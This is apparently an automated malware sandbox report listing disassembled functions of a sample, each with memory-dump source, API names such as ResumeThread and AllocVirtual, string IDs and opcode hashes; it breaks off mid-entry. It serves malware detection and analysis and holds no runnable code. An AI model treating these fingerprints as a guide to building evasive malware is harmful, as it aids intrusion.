                                                  • Instruction ID: 8d2cbaf69c670ca0ed97fd42b11369e5fb8e528207c5993ea6a54a06a0e9a6a5
                                                  • Opcode Fuzzy Hash: e55114d714575057e408849addae090ffaffc7b06ec11480e6b8755fb340cc23
                                                  • Instruction Fuzzy Hash: 1B31E57191DA498FFB5DD728A8226B877E2EF66310F544279D05FC71C2E91CA90983C1
                                                  Function 00007FFAACA89F1D Relevance: 2.6, Strings: 2, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: 8d116587cc2e86226e5f16ee3daf1e4b5a5045f1143a752c271d32c62cadc238
                                                  • Instruction ID: 5d3e495f611dcbeb8aa7d1cca0bec7eb3042e11111e46f47a429a03fc96238f9
                                                  • Opcode Fuzzy Hash: 8d116587cc2e86226e5f16ee3daf1e4b5a5045f1143a752c271d32c62cadc238
                                                  • Instruction Fuzzy Hash: E1318031A18A4ACFE748EB5C9491AB8B7A2EF59350B50C179D01EC3285EB24FC168BC0
                                                  Function 00007FFAACA8244B Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: ef8524c8e97ab3c49ceecda2ee218e10d86612fc1f01b7368cc82ad6b99d3a98
                                                  • Instruction ID: f4a305193c325e9687c6dc4090c99bcc22bddd291dde6acef974e6f6ebcbd527
                                                  • Opcode Fuzzy Hash: ef8524c8e97ab3c49ceecda2ee218e10d86612fc1f01b7368cc82ad6b99d3a98
                                                  • Instruction Fuzzy Hash: 5D312071A1990ADFE748DB58D4A1AB8B7A2FF59310B548179D01FC3692DF24BC16CBC0
                                                  Function 00007FFAAC4FB98A Relevance: 1.8, APIs: 1, Instructions: 296COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2517322419.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac4f0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID: CreateFileTransacted
                                                  • String ID:
                                                  • API String ID: 2149338676-0
                                                  • Opcode ID: 652e5dd73379fe9980adaa52c1bfe0928d8c068426c5f94c96a3a7a2c3c8442e
                                                  • Instruction ID: 59cce8f734e397dc9b385429f15d67a43fdb674af5a9df637a36baff7a98ddc6
                                                  • Opcode Fuzzy Hash: 652e5dd73379fe9980adaa52c1bfe0928d8c068426c5f94c96a3a7a2c3c8442e
                                                  • Instruction Fuzzy Hash: D1913370908A5C8FDB99DF58C894BE9BBF1FB6A310F1041AED04DE3291DB74A984CB44
                                                  Function 00007FFAAC4F9FB0 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2517322419.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac4f0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 901f236253316146a16f5930cc71c79d75cc1e464e1f86533db51e320ed0fd3c
                                                  • Instruction ID: 1a6a3c3d16945ab58316f76f75bff5a16993e24a550a72fbcfd10edccaf2fff3
                                                  • Opcode Fuzzy Hash: 901f236253316146a16f5930cc71c79d75cc1e464e1f86533db51e320ed0fd3c
                                                  • Instruction Fuzzy Hash: C681C070908A5C8FDB98DF58C894BA9BBF1FB6A301F1051AED04EE3651DB71A984CF44
                                                  Function 00007FFAAC4FBC35 Relevance: 1.7, APIs: 1, Instructions: 219fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2517322419.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac4f0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: 2820b32e47210fbe85c6c29e92be5df7b0a6954c9c71cdfc86cb2b093396626e
                                                  • Instruction ID: 64c24201bf8e126e6c5efe6d656a6291a9733bee22c2829587a3c995855825d1
                                                  • Opcode Fuzzy Hash: 2820b32e47210fbe85c6c29e92be5df7b0a6954c9c71cdfc86cb2b093396626e
                                                  • Instruction Fuzzy Hash: B0612570908A5C8FDB98DF58C895BE9BBF1FB6A311F1041AED04DE3251DB74A984CB40
                                                  Function 00007FFAAC4FD59A Relevance: 1.7, APIs: 1, Instructions: 158COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2517322419.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac4f0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem
                                                  • String ID:
                                                  • API String ID: 31276548-0
                                                  • Opcode ID: 223fe216b91bdd8e74c7a5f5184b2c381be71459b7d9132830c5565b3f223a9f
                                                  • Instruction ID: fbb8b59b0efe71ab5e7fd746cb00ac66e283340f9cdd8fa60049073d2c4c3426
                                                  • Opcode Fuzzy Hash: 223fe216b91bdd8e74c7a5f5184b2c381be71459b7d9132830c5565b3f223a9f
                                                  • Instruction Fuzzy Hash: 91417071908A4C8FEB99EF98D849BEDBBF0FB56315F00416AD00DD7252DA35A849CB80
                                                  Function 00007FFAAC55F1D7 Relevance: 1.6, APIs: 1, Instructions: 150threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2517322419.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac4f0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: ac9de7f2d4717ecc7cd7921d355a585a5bb8b84a2216c29b3652e42431f01caa
                                                  • Instruction ID: 20cf50ebf48493757a31b8a4fdbe27b0d55bd2cb9253f2cb96a772ef9c08d776
                                                  • Opcode Fuzzy Hash: ac9de7f2d4717ecc7cd7921d355a585a5bb8b84a2216c29b3652e42431f01caa
                                                  • Instruction Fuzzy Hash: CF410874D0861C8FEB58EFA8D885AEDBBF0FB5A310F10416ED40EE7251DA71A946CB50
                                                  Function 00007FFAAC4FD5D1 Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2517322419.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac4f0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem
                                                  • String ID:
                                                  • API String ID: 31276548-0
                                                  • Opcode ID: 9788c85e81aa5a540b054a13e7f7a31e9e982bb2e520a1b6c93664bf42493c51
                                                  • Instruction ID: 03a1692954c0874a3cedf30cf9e9b5038237b529ad243c3d0d2fefb14a39779f
                                                  • Opcode Fuzzy Hash: 9788c85e81aa5a540b054a13e7f7a31e9e982bb2e520a1b6c93664bf42493c51
                                                  • Instruction Fuzzy Hash: 3041927090DA8C8FDB59DF68D859BE9BBF0EF56310F0441ABD04DDB262CA349845CB40
                                                  Function 00007FFAAC6CAFD5 Relevance: 1.5, Strings: 1, Instructions: 248COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-1686368129
                                                  • Opcode ID: 92ae2bba4b0963195acb3c62fc78784aa35e5109aa04e80ae7ca26f5cc000125
                                                  • Instruction ID: f155ae3c6f96d3b61f88d0d90790ff973a02c4fdb6e7f0974adf2c166b02f9e5
                                                  • Opcode Fuzzy Hash: 92ae2bba4b0963195acb3c62fc78784aa35e5109aa04e80ae7ca26f5cc000125
                                                  • Instruction Fuzzy Hash: 5581033091E64ACFFB57DB64C855ABC7BA0FF86300F1061BAD01ED7182DE28E8498781
                                                  Function 00007FFAACA8923B Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-1686368129
                                                  • Opcode ID: e008da0508826a6878b85b3477e932152b507668603dadd69255282466f458f1
                                                  • Instruction ID: ec8bbcf64355690d011e874920970a70faf106b2e0eda2619ad2bd57ce487c0b
                                                  • Opcode Fuzzy Hash: e008da0508826a6878b85b3477e932152b507668603dadd69255282466f458f1
                                                  • Instruction Fuzzy Hash: 6971C43192E64ACFFB95DB74D8546BC7BA2FF46300F1484BAD00EC7191FE28AA458781
                                                  Function 00007FFAAC6C260B Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-1686368129
                                                  • Opcode ID: a53302465d3764596820420cafbc439cfdf05a061de529a4308aca892efbdf78
                                                  • Instruction ID: 7669791889e9facc8b5149e702fb24719ad30dfcf61d335c4d35898c72d84614
                                                  • Opcode Fuzzy Hash: a53302465d3764596820420cafbc439cfdf05a061de529a4308aca892efbdf78
                                                  • Instruction Fuzzy Hash: 6C61E37091E64ACFF757DB64C8946B97BA0FF56300F1064BAD40ED31D2DE28A84987A1
                                                  Function 00007FFAAC6CAA20 Relevance: 1.5, Strings: 1, Instructions: 204COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (3
                                                  • API String ID: 0-3558171836
                                                  • Opcode ID: 297c2f7539762f127ef5d5b1a9d3005632dd148cd2ded430807855d634c2c704
                                                  • Instruction ID: 7b28e9136972bc2c0f973fbb54540769ffa881d4a8cd7e00dc524588f4f8aea1
                                                  • Opcode Fuzzy Hash: 297c2f7539762f127ef5d5b1a9d3005632dd148cd2ded430807855d634c2c704
                                                  • Instruction Fuzzy Hash: 8B719070D1D55ACFEBAADB58C4556B877B1FF55300F1061BAC00EE3292DE38A989CB81
                                                  Function 00007FFAAC6D1540 Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (3
                                                  • API String ID: 0-3558171836
                                                  • Opcode ID: af599c95737c3a0b4e628b54652a4892d1612869c1da4ba9aa3c8ab767470084
                                                  • Instruction ID: 1c18ef278429ce7af1f1773fbcecf2e1f402d2f1f7d5fdf25a5113c49fa9fdb7
                                                  • Opcode Fuzzy Hash: af599c95737c3a0b4e628b54652a4892d1612869c1da4ba9aa3c8ab767470084
                                                  • Instruction Fuzzy Hash: 87718D70D1DA5ACFEBAADB58C4507B87BA1FF55310F1460BAD00ED3291DE78A9848B81
                                                  Function 00007FFAAC4FDA35 Relevance: 1.4, APIs: 1, Instructions: 194memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2517322419.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac4f0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 1d70b0bb38790c1ea7e41d7fee231efa58261fdf5082dd61c1728ca12043a2c0
                                                  • Instruction ID: f9fe5fc64989cbe6146cba44ea8be872c3a29e9804ceb09c5c18fd03cb7c3ad7
                                                  • Opcode Fuzzy Hash: 1d70b0bb38790c1ea7e41d7fee231efa58261fdf5082dd61c1728ca12043a2c0
                                                  • Instruction Fuzzy Hash: 0F512C70908A5C8FDF58DF58C855BE9BBF1FB6A314F1041AAD04EE3252DB70A985CB81
                                                  Function 00007FFAACA8176B Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: /
                                                  • API String ID: 0-1686368129
                                                  • Opcode ID: 2abd10b6169bf985f8bc6a2f0bb9ca82d4459259468249e6e1a3f1a1c3d96fce
                                                  • Instruction ID: 1b76bb93571b02c73a89f773229d0e4b998a88cf457ca7bc9a4655cd2ec4b416
                                                  • Opcode Fuzzy Hash: 2abd10b6169bf985f8bc6a2f0bb9ca82d4459259468249e6e1a3f1a1c3d96fce
                                                  • Instruction Fuzzy Hash: D851BD31D2964ACFEB45DB68D4455FDBBA2FF4A300F504579D10ED7191EE28A905CBC0
                                                  Function 00007FFAAC6C4440 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  • Opcode ID: 2819d190bf8cc6eabcff0c33b4c9c10d2787ac06811d6c1c3953175909b32035
                                                  • Instruction ID: 333c5be03569a9b65149dbc87fa83e823850ab0a727eff96048132cdb9beccde
                                                  • Opcode Fuzzy Hash: 2819d190bf8cc6eabcff0c33b4c9c10d2787ac06811d6c1c3953175909b32035
                                                  • Instruction Fuzzy Hash: 0D51B170A1D9068BF74ADB29C0506B5B791FF59300F54E279D00EC7A86DF28F8558BC4
                                                  Function 00007FFAAC6CD890 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4
                                                  • API String ID: 0-3371602342
                                                  • Opcode ID: eafb4f8caacddcb6c3fe809f88f43238556309c3fd6101e5d45c9a9b40d25f6f
                                                  • Instruction ID: 7dde84579fdc1dea60e3d4e983501df49424b0cc855e5060d57981e2d5985484
                                                  • Opcode Fuzzy Hash: eafb4f8caacddcb6c3fe809f88f43238556309c3fd6101e5d45c9a9b40d25f6f
                                                  • Instruction Fuzzy Hash: 6941E53091D55ACEFB6AD71884616B877B1FF95310F14A1BAC04ECB18BCD38A99987C1
                                                  Function 00007FFAAC6C4EB0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4
                                                  • API String ID: 0-3371602342
                                                  • Opcode ID: cac4bb61c5908a2b49d5b4beee602724ad3333ad2148f229b8a352d8e1c69723
                                                  • Instruction ID: 9f4cb5dfb839d79a21979f143a3637a1c6550b7c31ea0d6c331db3b217a42e27
                                                  • Opcode Fuzzy Hash: cac4bb61c5908a2b49d5b4beee602724ad3333ad2148f229b8a352d8e1c69723
                                                  • Instruction Fuzzy Hash: EF41042091D59ACFFBABD71884616F877A1FF95300F14E1BAD05EC71C6DD38A9888780
                                                  Function 00007FFAACA8D2C8 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4
                                                  • API String ID: 0-3371602342
                                                  • Opcode ID: f30510253e9ea24a78fc47b3af806c5eb1e31ea471e6b03158a996ab270dd691
                                                  • Instruction ID: c1d4dabd65bd1252cc24277e0f80aba09ca4da2029b852b4abfe47c702df7420
                                                  • Opcode Fuzzy Hash: f30510253e9ea24a78fc47b3af806c5eb1e31ea471e6b03158a996ab270dd691
                                                  • Instruction Fuzzy Hash: 8941193092D56ACEFB68D7189C566B877A2FF95300F1481BAC04FC7186DD3DE9898781
                                                  Function 00007FFAACA89FF3 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  • Opcode ID: 0c69b382d14f1ae3a8cafe9967ee4f6bee0e9cd143131cdf4856da3127e4bdcb
                                                  • Instruction ID: ae4afbc0636ca8fff72211bff5426b39512b480168a86550f071eb891631cbfd
                                                  • Opcode Fuzzy Hash: 0c69b382d14f1ae3a8cafe9967ee4f6bee0e9cd143131cdf4856da3127e4bdcb
                                                  • Instruction Fuzzy Hash: CC312871E2EA89CFF7589768A8116B87BA2EF46310F544179D05ED71C3E918AD0D83C0
                                                  Function 00007FFAACA88EB2 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  • Opcode ID: d9835aa9906a8b49a88d5bb5232a3d587997101614f0bdca1acdfc494bf598c6
                                                  • Instruction ID: 626f7d37e89588c36b50e8a04e61b0ae2c7cfbad07c44d371a8bc8dfdc5f4eb7
                                                  • Opcode Fuzzy Hash: d9835aa9906a8b49a88d5bb5232a3d587997101614f0bdca1acdfc494bf598c6
                                                  • Instruction Fuzzy Hash: 4F21F931A1891D8FDF98DB58D465AFDB7F2FF59300F0081AAD00EE7291DE35AA418B80
                                                  Function 00007FFAAC6CBD08 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  • Opcode ID: 5ff50bc0a5b7c588459d4b98b75d9b0df320c3943dc72338e9f8b7d0bd261f03
                                                  • Instruction ID: 8e1be82a89a89f001071f9d6502b98305e642b9d36332fe2632cdf1c8164771b
                                                  • Opcode Fuzzy Hash: 5ff50bc0a5b7c588459d4b98b75d9b0df320c3943dc72338e9f8b7d0bd261f03
                                                  • Instruction Fuzzy Hash: AA218130A1DA4A8BEB4ADB58C091968B7E1FF86750B54A179D00EC3282CA24FC16CBC5
                                                  Function 00007FFAAC6C2282 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  • Opcode ID: 2401cc21cdb0cd577a097a2acf3dc5d9bd8d5c93a934434cfe57c2e1f9ed4eac
                                                  • Instruction ID: 5142ceb706a2953833aaf2219bde7c5fd97fe5b03b6ea2c4e33f529629580ff0
                                                  • Opcode Fuzzy Hash: 2401cc21cdb0cd577a097a2acf3dc5d9bd8d5c93a934434cfe57c2e1f9ed4eac
                                                  • Instruction Fuzzy Hash: CE21F971E0891D9FDF99DB58C465AEDB7B1FF68310F0051AAD40EE3291CA35A9858B80
                                                  Function 00007FFAAC6D1792 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  • Opcode ID: 8b54d4764c7c29e077d5aa42c4b703ab77ee720f750839386dce8dbfb7b7c03a
                                                  • Instruction ID: 40a65cee59a425fcec0e97e10e7385b9c7d3e2818d26159c9e641a41dcd61b33
                                                  • Opcode Fuzzy Hash: 8b54d4764c7c29e077d5aa42c4b703ab77ee720f750839386dce8dbfb7b7c03a
                                                  • Instruction Fuzzy Hash: 8F211630A1891D9FDF9ADB58C4A5AEDB7B1FF58310F0051AA900EE3291CA74A9818B80
                                                  Function 00007FFAACA813E2 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  • Opcode ID: 9469e8bb3b3a36b7759091738076031203b950f23191c72d9235f2f905403381
                                                  • Instruction ID: a43d96b1689cfef4e925402fb2debd72d4dd70b3887e5d5cf17d8e270d3ed8de
                                                  • Opcode Fuzzy Hash: 9469e8bb3b3a36b7759091738076031203b950f23191c72d9235f2f905403381
                                                  • Instruction Fuzzy Hash: 8521F670A1891D9FDF99EB58C455AFDB7B2FF59310F0041AAD04FE3291DE35AA818B80
                                                  Function 00007FFAAC6CAC89 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  • Opcode ID: aa9043dd52c30e5240c7d923b6d59d54263e52eee52f9ba65e64ccd2fc14363c
                                                  • Instruction ID: 003d34f84a47bd076cbdac7423fc9d4c4dc966d91ca591a28a1a8dd86792eee9
                                                  • Opcode Fuzzy Hash: aa9043dd52c30e5240c7d923b6d59d54263e52eee52f9ba65e64ccd2fc14363c
                                                  • Instruction Fuzzy Hash: D8213D70E195099FEB9ADB58D455ABDB7B1FF59310F0051BED00FE3292CE34A9458B80
                                                  Function 00007FFAACA823E7 Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6
                                                  • API String ID: 0-2984296541
                                                  • Opcode ID: 4a0034453be28a8cdfe2e21c6edc346a9dd0878968a1429e7588eb24619946b7
                                                  • Instruction ID: 5d71906d324e6667e9257b0d64163bf5434c223cd3c48c96b09248cebfd88824
                                                  • Opcode Fuzzy Hash: 4a0034453be28a8cdfe2e21c6edc346a9dd0878968a1429e7588eb24619946b7
                                                  • Instruction Fuzzy Hash: DDD0C292E1E2818FF72A037408621B82E91CF273407445BB6C28F4A1D3E8096D089391
                                                  Function 00007FFAACA84CA1 Relevance: .4, Instructions: 417COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
